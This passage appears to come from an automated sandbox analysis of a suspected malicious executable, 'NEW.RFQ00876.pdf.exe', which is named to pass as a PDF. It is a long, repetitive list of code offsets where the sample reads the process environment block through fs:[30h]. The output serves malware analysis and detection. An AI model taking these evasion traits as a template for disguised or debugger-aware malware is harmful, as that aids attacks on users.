                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856154 mov eax, dword ptr fs:[00000030h]15_2_01856154
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856154 mov eax, dword ptr fs:[00000030h]15_2_01856154
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C156 mov eax, dword ptr fs:[00000030h]15_2_0184C156
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E8158 mov eax, dword ptr fs:[00000030h]15_2_018E8158
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185208A mov eax, dword ptr fs:[00000030h]15_2_0185208A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E80A8 mov eax, dword ptr fs:[00000030h]15_2_018E80A8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019160B8 mov eax, dword ptr fs:[00000030h]15_2_019160B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019160B8 mov ecx, dword ptr fs:[00000030h]15_2_019160B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D20DE mov eax, dword ptr fs:[00000030h]15_2_018D20DE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A0E3 mov ecx, dword ptr fs:[00000030h]15_2_0184A0E3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018580E9 mov eax, dword ptr fs:[00000030h]15_2_018580E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D60E0 mov eax, dword ptr fs:[00000030h]15_2_018D60E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C0F0 mov eax, dword ptr fs:[00000030h]15_2_0184C0F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018920F0 mov ecx, dword ptr fs:[00000030h]15_2_018920F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4000 mov ecx, dword ptr fs:[00000030h]15_2_018D4000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]15_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E016 mov eax, dword ptr fs:[00000030h]15_2_0186E016
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E016 mov eax, dword ptr fs:[00000030h]15_2_0186E016
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E016 mov eax, dword ptr fs:[00000030h]15_2_0186E016
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E016 mov eax, dword ptr fs:[00000030h]15_2_0186E016
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A020 mov eax, dword ptr fs:[00000030h]15_2_0184A020
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C020 mov eax, dword ptr fs:[00000030h]15_2_0184C020
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6030 mov eax, dword ptr fs:[00000030h]15_2_018E6030
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852050 mov eax, dword ptr fs:[00000030h]15_2_01852050
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6050 mov eax, dword ptr fs:[00000030h]15_2_018D6050
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187C073 mov eax, dword ptr fs:[00000030h]15_2_0187C073
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187438F mov eax, dword ptr fs:[00000030h]15_2_0187438F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187438F mov eax, dword ptr fs:[00000030h]15_2_0187438F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E388 mov eax, dword ptr fs:[00000030h]15_2_0184E388
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E388 mov eax, dword ptr fs:[00000030h]15_2_0184E388
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E388 mov eax, dword ptr fs:[00000030h]15_2_0184E388
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01848397 mov eax, dword ptr fs:[00000030h]15_2_01848397
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01848397 mov eax, dword ptr fs:[00000030h]15_2_01848397
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01848397 mov eax, dword ptr fs:[00000030h]15_2_01848397
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]15_2_0185A3C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018583C0 mov eax, dword ptr fs:[00000030h]15_2_018583C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018583C0 mov eax, dword ptr fs:[00000030h]15_2_018583C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018583C0 mov eax, dword ptr fs:[00000030h]15_2_018583C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018583C0 mov eax, dword ptr fs:[00000030h]15_2_018583C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D63C0 mov eax, dword ptr fs:[00000030h]15_2_018D63C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F43D4 mov eax, dword ptr fs:[00000030h]15_2_018F43D4
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F43D4 mov eax, dword ptr fs:[00000030h]15_2_018F43D4
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190C3CD mov eax, dword ptr fs:[00000030h]15_2_0190C3CD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]15_2_018603E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E3F0 mov eax, dword ptr fs:[00000030h]15_2_0186E3F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E3F0 mov eax, dword ptr fs:[00000030h]15_2_0186E3F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E3F0 mov eax, dword ptr fs:[00000030h]15_2_0186E3F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018863FF mov eax, dword ptr fs:[00000030h]15_2_018863FF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A30B mov eax, dword ptr fs:[00000030h]15_2_0188A30B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A30B mov eax, dword ptr fs:[00000030h]15_2_0188A30B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A30B mov eax, dword ptr fs:[00000030h]15_2_0188A30B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C310 mov ecx, dword ptr fs:[00000030h]15_2_0184C310
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01870310 mov ecx, dword ptr fs:[00000030h]15_2_01870310
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191A352 mov eax, dword ptr fs:[00000030h]15_2_0191A352
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]15_2_018D2349
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov ecx, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]15_2_018D035C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F8350 mov ecx, dword ptr fs:[00000030h]15_2_018F8350
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F437C mov eax, dword ptr fs:[00000030h]15_2_018F437C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E284 mov eax, dword ptr fs:[00000030h]15_2_0188E284
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E284 mov eax, dword ptr fs:[00000030h]15_2_0188E284
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602A0 mov eax, dword ptr fs:[00000030h]15_2_018602A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602A0 mov eax, dword ptr fs:[00000030h]15_2_018602A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov ecx, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184823B mov eax, dword ptr fs:[00000030h]15_2_0184823B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D8243 mov eax, dword ptr fs:[00000030h]15_2_018D8243
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D8243 mov ecx, dword ptr fs:[00000030h]15_2_018D8243
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A250 mov eax, dword ptr fs:[00000030h]15_2_0184A250
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856259 mov eax, dword ptr fs:[00000030h]15_2_01856259
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184826B mov eax, dword ptr fs:[00000030h]15_2_0184826B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01884588 mov eax, dword ptr fs:[00000030h]15_2_01884588
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852582 mov eax, dword ptr fs:[00000030h]15_2_01852582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852582 mov ecx, dword ptr fs:[00000030h]15_2_01852582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E59C mov eax, dword ptr fs:[00000030h]15_2_0188E59C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018745B1 mov eax, dword ptr fs:[00000030h]15_2_018745B1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018745B1 mov eax, dword ptr fs:[00000030h]15_2_018745B1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E5CF mov eax, dword ptr fs:[00000030h]15_2_0188E5CF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E5CF mov eax, dword ptr fs:[00000030h]15_2_0188E5CF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018565D0 mov eax, dword ptr fs:[00000030h]15_2_018565D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A5D0 mov eax, dword ptr fs:[00000030h]15_2_0188A5D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A5D0 mov eax, dword ptr fs:[00000030h]15_2_0188A5D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018525E0 mov eax, dword ptr fs:[00000030h]15_2_018525E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C5ED mov eax, dword ptr fs:[00000030h]15_2_0188C5ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C5ED mov eax, dword ptr fs:[00000030h]15_2_0188C5ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6500 mov eax, dword ptr fs:[00000030h]15_2_018E6500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858550 mov eax, dword ptr fs:[00000030h]15_2_01858550
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858550 mov eax, dword ptr fs:[00000030h]15_2_01858550
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018564AB mov eax, dword ptr fs:[00000030h]15_2_018564AB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018844B0 mov ecx, dword ptr fs:[00000030h]15_2_018844B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DA4B0 mov eax, dword ptr fs:[00000030h]15_2_018DA4B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018504E5 mov ecx, dword ptr fs:[00000030h]15_2_018504E5
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C427 mov eax, dword ptr fs:[00000030h]15_2_0184C427
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
